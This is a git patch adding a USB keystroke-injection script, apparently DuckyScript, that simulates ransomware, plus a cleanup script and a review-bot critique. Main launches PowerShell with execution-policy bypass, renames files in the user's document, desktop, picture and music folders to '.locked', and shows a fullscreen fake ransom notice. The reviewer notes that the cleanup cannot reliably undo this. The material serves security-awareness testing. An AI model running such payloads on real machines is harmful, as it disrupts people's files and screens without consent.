From 75d74058f626227fa476c6be1cce993aa9d83215 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Sat, 18 May 2024 12:06:50 -0400
Subject: [PATCH] Create RansomwareTest
---
RansomwareTest | 69 ++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 69 insertions(+)
create mode 100644 RansomwareTest
diff --git a/RansomwareTest b/RansomwareTest
new file mode 100644
index 0000000..610151e
--- /dev/null
+++ b/RansomwareTest
@@ -0,0 +1,69 @@
+# Main
+REM This script was created by github.com/MarkCyber
+REM This script is intended to act as a simulation of a ransomware attack
+REM This script will change all file extensions to .locked rather than encrypting the files
+REM This script will also display a simulated encrypted message
+
+DELAY 1000
+GUI r
+DELAY 1000
+STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "
+$locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music');
+$errorOccurred = $false;
+foreach ($loc in $locations) {
+ $path = [Environment]::GetFolderPath($loc);
+ $files = Get-ChildItem -Path $path -File;
+ foreach ($file in $files) {
+ try {
+ Rename-Item -Path $file.FullName -NewName ($file.Name + '.locked');
+ } catch {
+ $errorOccurred = $true;
+ }
+ }
+}
+if ($errorOccurred) {
+ Write-Host 'An error occurred while renaming files';
+}
+Add-Type -AssemblyName PresentationFramework;
+$Window = New-Object System.Windows.Window;
+$Window.WindowStartupLocation = 'CenterScreen';
+$Window.WindowState = 'Maximized';
+$Window.Topmost = $true;
+$Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.';
+$Window.ShowDialog();
+"
+ENTER
+DELAY 1000
+
+STRING exit
+ENTER
+
+
+
+
+
+
+
+# Cleanup
+REM This script was created by github.com/MarkCyber
+REM This is a follow-up script to the RansomwareSimulation
+REM This script is to revert all changes from the RansomwareSimulation script
+
+DELAY 1000
+GUI r
+DELAY 2000
+STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "
+$locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music');
+foreach ($loc in $locations) {
+ $path = [Environment]::GetFolderPath($loc);
+ $files = Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') };
+ foreach ($file in $files) {
+ Rename-Item -Path $file.FullName -NewName ($file.Name -replace '\.locked$', '');
+ }
+}
+"
+ENTER
+DELAY 1000
+
+STRING exit
+ENTER
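Review bot: Cleanup cannot reliably undo Main, because Main keeps no record of what it renamed and Cleanup strips `.locked` from every matching file in the four folders, including any file that already had that suffix before the test. Recording each `$file.FullName` in a manifest during Main and restoring only those entries would make the test reversible; running it against a seeded test profile rather than live user folders is safer still. The `try`/`catch` in Main likely never fires, since `Rename-Item` failures are normally non-terminating; add `-ErrorAction Stop` to the call, and give Cleanup the same handling, as it currently has none. Both payloads also live in one file, so if it is loaded as a single payload the Cleanup keystrokes begin one second after `ENTER` while the `ShowDialog()` window is presumably still open; they should be separate files.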